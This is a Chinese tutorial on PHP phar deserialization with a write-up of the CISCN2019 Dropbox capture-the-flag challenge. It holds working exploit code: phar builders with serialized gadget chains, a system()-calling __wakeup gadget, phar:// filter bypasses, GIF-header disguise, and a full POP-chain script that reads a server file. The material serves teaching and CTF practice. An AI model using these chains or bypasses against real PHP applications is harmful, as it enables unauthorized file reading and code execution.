0x00 phar反序列化
phar反序列化即在文件系統函數(file_exists()
、is_dir()
等)參數可控的情況下,配合phar://僞協議
,可以不依賴unserialize()
直接進行反序列化操作。
關於其他反序列化的總結,可以看我的這篇文章
0x01 原理
首先了解一下phar文件的結構,一個phar文件由四部分構成:
-
a stub:可以理解爲一個標誌,格式爲
xxx<?php xxx; __HALT_COMPILER();?>
,前面內容不限,但必須以__HALT_COMPILER();?>
來結尾,否則phar擴展將無法識別這個文件爲phar文件。 -
a manifest describing the contents:phar文件本質上是一種壓縮文件,其中每個被壓縮文件的權限、屬性等信息都放在這部分。這部分還會以序列化的形式存儲用戶自定義的meta-data,這是上述攻擊手法最核心的地方。
-
the file contents:被壓縮文件的內容。
-
[optional] a signature for verifying Phar integrity (phar file format only):簽名,放在文件末尾
0x02 demo
注意:如果想要生成Phar文件,要將php.ini
中的phar.readonly
選項設置爲Off
,否則無法生成phar
文件。
<?php
class Test {}
$o = new Test();
@unlink("phar.phar");
$phar = new Phar("phar.phar"); //後綴名必須爲phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //設置stub
$phar->setMetadata($o); //將自定義的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要壓縮的文件
//簽名自動計算
$phar->stopBuffering();
?>
可以看到meta-data是以序列化的形式存儲的:
0x03 影響的函數
知道創宇的seaii 更爲我們指出了所有文件函數均可使用:
但實際上只要調用了php_stream_open_wrapper
的函數,都存在這樣的問題。
因此還有如下函數:
exif
exif_thumbnail
exif_imagetype
gd
imageloadfont
imagecreatefrom
hash
hash_hmac_file
hash_file
hash_update_file
md5_file
sha1_file
file / url
get_meta_tags
get_headers
mime_content_type
standard
getimagesize
getimagesizefromstring
finfo
finfo_file
finfo_buffer
zip
$zip = new ZipArchive();
$res = $zip->open('c.zip');
$zip->extractTo('phar://test.phar/test');
Postgres
<?php
$pdo = new PDO(sprintf("pgsql:host=%s;dbname=%s;user=%s;password=%s", "127.0.0.1", "postgres", "sx", "123456"));
@$pdo->pgsqlCopyFromFile('aa', 'phar://test.phar/aa');
MySQL
LOAD DATA LOCAL INFILE
也會觸發這個php_stream_open_wrapper
<?php
class A {
public $s = '';
public function __wakeup () {
system($this->s);
}
}
$m = mysqli_init();
mysqli_options($m, MYSQLI_OPT_LOCAL_INFILE, true);
$s = mysqli_real_connect($m, 'localhost', 'root', '123456', 'easyweb', 3306);
$p = mysqli_query($m, 'LOAD DATA LOCAL INFILE \'phar://test.phar/test\' INTO TABLE a LINES TERMINATED BY \'\r\n\' IGNORE 1 LINES;');
再配置一下mysqld。(非默認配置)
[mysqld]
local-infile=1
secure_file_priv=""
0x04 Trick
(1)如果過濾了phar://
協議怎麼辦呢?
有以下幾種方法可以繞過:
-
compress.bzip2://phar://
-
compress.zlib://phar:///
-
php://filter/resource=phar://
(2)除此之外,我們還可以將phar僞造成其他格式的文件。
php識別phar文件是通過其文件頭的stub,更確切一點來說是__HALT_COMPILER();?>
這段代碼,對前面的內容或者後綴名是沒有要求的。那麼我們就可以通過添加任意的文件頭+修改後綴名的方式將phar文件僞裝成其他格式的文件。如下:
<?php
class TestObject {
}
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //設置stub,增加gif文件頭
$o = new TestObject();
$phar->setMetadata($o); //將自定義meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要壓縮的文件
//簽名自動計算
$phar->stopBuffering();
?>
可以看到加了GIF89a文件頭,從而使其僞裝成gif文件:
0x05 實例分析
CISCN2019 Dropbox
進入題目後,註冊一個賬號並登錄,發現是一個網盤界面,限制了只能上傳圖片後綴,並能進行下載、刪除操作:
沒有其他什麼利用點,我們抓一下下載的包:
發現可以成功讀取到文件的內容,於是嘗試任意文件下載:
確認存在任意文件下載,upload.php
、class.php
、download.php
、index.php
、login.php
、register.php
均可以下載得到源碼,下面就是進行代碼審計了。
//download.php
<?php
session_start();
if (!isset($_SESSION['login'])) {
header("Location: login.php");
die();
}
if (!isset($_POST['filename'])) {
die();
}
include "class.php";
ini_set("open_basedir", getcwd() . ":/etc:/tmp");
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) {
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=" . basename($filename));
echo $file->close();
} else {
echo "File not exist";
}
?>
=
在download.php
中我們可以看到它過濾了flag
,這反而說明了flag
就在當前目錄下,但是不允許通過任意文件下載讀取。
繼續審計,發現在class.php
中File
類的close
方法有敏感函數file_get_contents()
,這裏應該就是利用點。
//class.php
<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);
class User {
public $db;
public function __construct() {
global $db;
$this->db = $db;
}
public function user_exist($username) {
$stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->store_result();
$count = $stmt->num_rows;
if ($count === 0) {
return false;
}
return true;
}
public function add_user($username, $password) {
if ($this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
return true;
}
public function verify_user($username, $password) {
if (!$this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->bind_result($expect);
$stmt->fetch();
if (isset($expect) && $expect === $password) {
return true;
}
return false;
}
public function __destruct() {
$this->db->close();
}
}
class FileList {
private $files;
private $results;
private $funcs;
public function __construct($path) {
$this->files = array();
$this->results = array();
$this->funcs = array();
$filenames = scandir($path);
$key = array_search(".", $filenames);
unset($filenames[$key]);
$key = array_search("..", $filenames);
unset($filenames[$key]);
foreach ($filenames as $filename) {
$file = new File();
$file->open($path . $filename);
array_push($this->files, $file);
$this->results[$file->name()] = array();
}
}
public function __call($func, $args) {//$func = close()
array_push($this->funcs, $func);
foreach ($this->files as $file) {
$this->results[$file->name()][$func] = $file->$func();
//$file->close() $file = new File;
}
}
public function __destruct() {
$table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
$table .= '<thead><tr>';
foreach ($this->funcs as $func) {
$table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
}
$table .= '<th scope="col" class="text-center">Opt</th>';
$table .= '</thead><tbody>';
foreach ($this->results as $filename => $result) {
$table .= '<tr>';
foreach ($result as $func => $value) {
$table .= '<td class="text-center">' . htmlentities($value) . '</td>';
}
$table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下載</a> / <a href="#" class="delete">刪除</a></td>';
$table .= '</tr>';
}
echo $table;
}
}
class File {
public $filename;
public function open($filename) {
$this->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true;
} else {
return false;
}
}
public function name() {
return basename($this->filename);
}
public function size() {
$size = filesize($this->filename);
$units = array(' B', ' KB', ' MB', ' GB', ' TB');
for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
return round($size, 2).$units[$i];
}
public function detele() {
unlink($this->filename);
}
public function close() {
return file_get_contents($this->filename);
}
}
?>
下面要思考的就是如何才能利用到這個函數,看到這些類以及魔術方法,不難想到應該是使用PHP反序列化來讀取文件。
但是發現整個代碼裏沒有使用unserialize()
函數,這時就要利用上面的Phar反序列化,我們尋找利用點。
在delete.php
中:
<?php
session_start();
if (!isset($_SESSION['login'])) {
header("Location: login.php");
die();
}
if (!isset($_POST['filename'])) {
die();
}
include "class.php";
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
$file->detele();
Header("Content-type: application/json");
$response = array("success" => true, "error" => "");
echo json_encode($response);
} else {
Header("Content-type: application/json");
$response = array("success" => false, "error" => "File not exist");
echo json_encode($response);
}
?>
可以看到創建了一個File
類的對象,然後調用了open()
方法,參數就是我們要刪除的文件名,我們去看一下這個open()
方法:
public function open($filename) {
$this->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true;
} else {
return false;
}
}
使用了file_exists()
和is_dir()
處理了filename
,而前面總結過,這兩個函數都可以造成phar反序列化。
這樣這題的思路就清楚了,即利用phar反序列化控制file_get_contents
來讀取flag.txt
於是我們來審計class.php
構造序列化腳本,首先找一下有哪些魔術方法,看到User類中__destruct()
調用了同名的close()
方法,而FileList類中有__call()
方法。
熟悉反序列化的應該很容易看出來:將User類的$db
實例化爲FIleLise的對象,這樣當析構函數被調用的時候,就會調用FileList類的close()
方法,而FileList類並沒有該方法,於是調用__call()
方法,觀察一下__call
方法:
public function __call($func, $args) {
array_push($this->funcs, $func);
foreach ($this->files as $file) {
$this->results[$file->name()][$func] = $file->$func();
}
}
調用後相當於把close
傳給了參數$func
,然後遍歷$files
分別調用每個值的$func()
方法,這裏也就是調用close()
,並將結果賦給result
。
所以只需要$files
裏有一個File類的對象,就能調用File類中的close()
方法了,再將File類的filename
賦爲/flag.txt
即可將結果讀出來,然後在FileList類的__destruct()
方法中會result
的結果打印出來。
最終腳本如下:
<?php
class User
{
public $db;
public function __construct()
{
$this->db = new FileList;
}
}
class FileList
{
private $files;
private $results;
private $funcs;
public function __construct()
{
$file = new File;
$this->files = array($file);
$this->results = array();
$this->funcs = array();
}
}
class File
{
public $filename;
public function __construct()
{
$this->filename = '/flag.txt';
}
}
$o = new User();
@unlink("shell.phar");
$phar = new Phar("shell.phar"); //後綴名必須爲phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //設置stub
$phar->setMetadata($o); //將自定義的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要壓縮的文件
//簽名自動計算
$phar->stopBuffering();
運行得到shell.phar
,改後綴爲png上傳:
在刪除的時候抓包,並加上phar://
僞協議,然後發包即可成功讀到flag:
本篇文章以總結爲主,所以部分內容參考了下列文章:
https://paper.seebug.org/680/
https://blog.zsxsoft.com/post/38
https://xz.aliyun.com/t/6057